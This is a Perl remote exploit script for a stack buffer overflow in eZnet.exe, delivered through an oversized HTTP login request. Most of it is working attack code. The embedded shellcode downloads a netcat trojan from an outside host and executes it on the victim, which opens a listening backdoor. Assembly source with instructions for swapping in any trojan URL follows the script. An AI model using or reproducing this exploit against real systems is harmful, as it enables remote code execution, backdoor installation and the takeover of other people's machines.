#!/usr/bin/perl -w
#
# Stack Overflow in eZnet.exe - Remote Exploit
#
# Will download a trojan from any address which you provide
# on the target system, then will execute the trojan.
#
# For this exploit I have tried several strategies to increase
# reliability and performance:
#
# + Jump to a static 'call esp'
# + Backwards jump to code a known distance from the stack pointer
# since the stack address seems to change for each version of
# eznet.
# + Works out the byte difference for custom urls
# (must be no longer than 254 bytes!!)
# + Causes eznet.exe to restart (not really my choice ;o)
# + Shellcode steals addresses from a static module.
#
# (Shellcode is attached to the bottom of this file!)
#
# - by Peter Winter-Smith []
use IO::Socket;
if(!($ARGV[1]))
{
print "\nUsage: eZnetexploit.pl \n" .
" + netcat trojan at http://www.elitehaven.net/ncat.exe\n" .
" + listens on port 9999.\n\n";
exit;
}
print "eZnet.exe remote trojan downloader exploit\n";
$victim = IO::Socket::INET->new(Proto=>'tcp',
PeerAddr=>$ARGV[0],
PeerPort=>"80")
or die "Unable to connect to $ARGV[0] on port 80";
$tlen = chr(length($ARGV[1]) + 1);
$shellcode = "\xEB\x3C\x5F\x55\x89\xE5\x81\xC4" .
"\xE8\xFF\xFF\xFF\x57\x31\xDB\xB3" .
"\x07\xB0\xFF\xFC\xF2\xAE\xFE\x47" .
"\xFF\xFE\xCB\x80\xFB\x01\x75\xF4" .
"\x5F\x57\x8D\x7F\x0B\x57\x8D\x7F" .
"\x13\x57\x8D\x7F\x08\x57\x8D\x7F" .
$tlen .
"\x57\x8D\x7F\x09\x47\x57\x8D" .
"\x54\x24\x14\x52\xEB\x02\xEB\x52" .
"\x89\xD6\xFF\x36\xFF\x15\x1C\x91" .
"\x04\x10\x5A\x52\x8D\x72\xFC\xFF" .
"\x36\x50\xFF\x15\xCC\x90\x04\x10" .
"\x5A\x52\x31\xC9\x51\x51\x8D\x72" .
"\xF0\xFF\x36\x8D\x72\xF4\xFF\x36" .
"\x51\xFF\xD0\x5A\x52\xFF\x72\xEC" .
"\xFF\x15\x1C\x91\x04\x10\x5A\x52" .
"\x8D\x72\xF8\xFF\x36\x50\xFF\x15" .
"\xCC\x90\x04\x10\x5A\x52\x31\xC9" .
"\x41\x51\x8D\x72\xF0\xFF\x36\xFF" .
"\xD0\xCC\xE8\x6B\xFF\xFF\xFF\x55" .
"\x52\x4C\x4D\x4F\x4E\x2E\x44\x4C" .
"\x4C\xFF\x55\x52\x4C\x44\x6F\x77" .
"\x6E\x6C\x6F\x61\x64\x54\x6F\x46" .
"\x69\x6C\x65\x41\xFF\x57\x69\x6E" .
"\x45\x78\x65\x63\xFF" . $ARGV[1] .
"\xFF" .
"\x63\x3A\x5C\x6E\x63\x2E\x65\x78" .
"\x65\xFF\x6B\x65\x72\x6E\x65\x6C" .
"\x33\x32\x2E\x64\x6C\x6C\xFF";
$jmpcode = "\x89\xE0\x66\x2D\x38\x32\xFF\xE0";
$eip = "\xBB\x33\x05\x10";
$packet = "" .
"GET /SwEzModule.dll?operation=login&autologin=" .
"\x90"x65 . $shellcode . "a"x(4375 - length($ARGV[1])) . $eip . "\x90"x20 . $jmpcode .
"\x20HTTP/1.0.User-Agent: SoftwaxAsys/2.1.10\n\n";
print $victim $packet;
print " + Making Request ...\n + Trojan should download - best of luck!\n";
sleep(4);
close($victim);
print "Done.\n";
exit;
#-----------------------------[vampiric.asm]------------------------------
# ; 'eZnet.exe' (eZmeeting, eZnetwork, eZphotoshare, eZshare, eZ)
# ; (cryptso.dll vampiric shellcode)
# ; Url Download + Execute
# ; By Peter Winter-Smith
# ; []
#
# bits 32
#
# jmp short killnull
#
# next:
# pop edi
#
# push ebp
# mov ebp, esp
# add esp, -24
#
# push edi
#
# xor ebx, ebx
# mov bl, 07h
# mov al, 0ffh
#
# cld
# nullify:
# repne scasb
# inc byte [edi-01h]
# dec bl
# cmp bl, 01h
# jne nullify
#
# pop edi
#
# push edi ; 'URLMON.DLL'
# lea edi, [edi+11]
# push edi ; 'URLDownloadToFileA'
# lea edi, [edi+19]
# push edi ; 'WinExec'
# lea edi, [edi+08]
# push edi ; 'http://www.elitehaven.net/ncat.exe'
# lea edi, [edi+35]
# push edi ; 'c:\nc.exe'
# lea edi, [edi+09]
# inc edi
# push edi ; 'kernel32.dll'
#
# lea edx, [esp+20]
# push edx
#
# jmp short over
# killnull:
# jmp short data
# over:
#
# mov esi, edx
# push dword [esi]
#
# call [1004911ch] ; LoadLibraryA
#
# pop edx
# push edx
# lea esi, [edx-04]
# push dword [esi]
#
# push eax
#
# call [100490cch] ; GetProcAddress("URLMON.DLL", URLDownloadToFileA);
#
# pop edx
# push edx
#
# xor ecx, ecx
# push ecx
# push ecx
# lea esi, [edx-16] ; file path
# push dword [esi]
# lea esi, [edx-12] ; url
# push dword [esi]
# push ecx
#
# call eax
#
# pop edx
# push edx
#
# push dword [edx-20]
#
# call [1004911ch] ; LoadLibraryA
#
# pop edx
# push edx
#
#
# lea esi, [edx-08]
# push dword [esi] ; 'WinExec'
# push eax ; kernel32.dll handle
#
# call [100490cch] ; GetProcAddress("kernel32.dll", WinExec);
#
# pop edx
# push edx
#
# xor ecx, ecx
# inc ecx
# push ecx
#
# lea esi, [edx-16] ; file path
# push dword [esi]
#
# call eax
#
# int3
#
# ta:
# call next
# db 'URLMON.DLL',0ffh
# db 'URLDownloadToFileA',0ffh
# db 'WinExec',0ffh
# db 'http://www.elitehaven.net/ncat.exe',0ffh
# ; When altering, you MUST be sure
# ; to also alter the offsets in the 0ffh to null
# ; byte search!
# ; for example:
# ; db 'http://www.site.com/someguy/trojan.exe',0ffh
# ; count the length of the url, and add one for the 0ffh byte.
# ; The above url is 38 bytes long, plus one for our null, is 39 bytes.
# ; find the code saying (at the start of the shellcode):
# ; push edi ; 'http://www.elitehaven.net/ncat.exe'
# ; lea edi, [edi+35]
# ; and make it:
# ; push edi ; 'http://www.site.com/someguy/trojan.exe'
# ; lea edi, [edi+39]
# ; same goes for the filename below :o)
# db 'c:\nc.exe',0ffh
# db 'kernel32.dll',0ffh
#-------------------------------------------------------------------------
#------------------------------[subcode.asm]------------------------------
# ; eZnet.exe Sub-Shellcode
# ; []
#
# ;100533BBh
#
# bits 32
#
# mov eax, esp
# sub ax, 3238h
# jmp eax
#-----------------------------------------------
